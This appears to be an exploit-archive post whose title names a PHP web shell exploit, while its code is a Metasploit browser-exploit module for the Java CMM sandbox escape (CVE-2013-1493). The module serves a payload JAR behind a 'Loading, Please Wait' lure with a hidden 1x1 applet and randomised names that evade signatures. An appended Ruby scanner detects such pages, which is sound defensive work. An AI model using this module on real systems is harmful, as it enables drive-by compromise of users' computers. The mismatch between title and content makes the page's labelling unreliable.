STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled classes shipped with the framework under
  # data/exploits/cve-2013-1493 and give the applet entry class a random name.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve the JAR for "*.jar" requests, the applet HTML page for the
  # resource root, and redirect everything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the framework's own markers inside the JAR entries.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|

    return html
  end

end
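The delivery page built by generate_html above has a recognisable shape: a bare "Loading, Please Wait" lure, a 1x1 applet tag, a jar whose name carries no meaning, and an entry class sitting outside any package. The following Ruby is an added example written for this page, not code from the post or from the Metasploit module: a small heuristic scanner that a defender could run over captured HTTP response bodies (proxy logs, sandbox output) to flag pages of that shape. The function names, the scoring rule (two or more heuristics hit) and the sample HTML are all constructed for the example; the heuristics are deliberately simple and will need tuning against real traffic.

```ruby
# Added example: heuristic detection of applet-delivery pages of the kind
# generate_html above produces. Not part of the original post or module.
# All function names, thresholds and sample documents are constructed here.

# Matches one HTML attribute: name = "value" | 'value' | bare
ATTR_RE = /(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/

# Lure text used by the page in the module above (case/spacing tolerant).
LURE_RE = /loading,?\s*please\s*wait/i

# Return one lowercase-keyed attribute hash per <applet ...> tag in the body.
def applet_tags(html)
  html.scan(/<applet\b([^>]*)>/i).map do |(attrs)|
    attrs.scan(ATTR_RE).each_with_object({}) do |(k, dq, sq, bare), h|
      h[k.downcase] = dq || sq || bare
    end
  end
end

# Heuristics for a single applet tag; returns the list of reasons that fired.
# A missing width/height is treated as hidden, since nothing is meant to show.
def suspicious_reasons(attrs, html)
  reasons = []
  w = attrs.fetch('width', '0').to_i
  h = attrs.fetch('height', '0').to_i
  reasons << 'applet rendered at 1x1 or smaller' if w <= 1 && h <= 1

  # Real applets are almost always packaged (com.vendor.Foo); exploit drops
  # tend to use a top-level class with a short or random name.
  entry = attrs['code'].to_s.sub(/\.class\z/i, '')
  reasons << 'entry class sits outside any package' if !entry.empty? && !entry.include?('.')

  reasons << 'page text is a bare "loading, please wait" lure' if html =~ LURE_RE
  reasons
end

# Scan a response body; report only applets where at least two heuristics fire,
# so a single coincidence (e.g. a legitimately small applet) is not flagged.
def scan_applet_delivery(html)
  applet_tags(html)
    .map { |a| { applet: a, reasons: suspicious_reasons(a, html) } }
    .select { |f| f[:reasons].size >= 2 }
end

# Constructed sample mirroring the shape of the page the module serves.
SAMPLE_HTML = <<~HTML
  <html><head><title>Loading, Please Wait...</title></head>
  <body><center><p>Loading, Please Wait...</p></center>
  <applet archive="qzkwpmta.jar" code="Wqks.class" width="1" height="1"></applet>
  </body></html>
HTML

# Constructed benign page: a visible, packaged applet with a descriptive jar name.
BENIGN_HTML = <<~HTML
  <html><body>
  <applet archive="charts.jar" code="com.example.ChartApplet.class" width="640" height="480"></applet>
  </body></html>
HTML

if __FILE__ == $0
  [SAMPLE_HTML, BENIGN_HTML].each do |doc|
    findings = scan_applet_delivery(doc)
    if findings.empty?
      puts "no suspicious applet tags"
    else
      findings.each do |f|
        puts "suspicious applet archive=#{f[:applet]['archive']} code=#{f[:applet]['code']}"
        f[:reasons].each { |r| puts "  - #{r}" }
      end
    end
  end
end
```

Run it on its own to see the constructed lure page flagged with all three reasons and the benign page pass. Because the module randomises the jar name and the entry class on every request, signatures on those strings are useless; the scanner instead keys on properties the page cannot easily change while still working, which is the usual trade-off when writing detections for a generator rather than a fixed artefact.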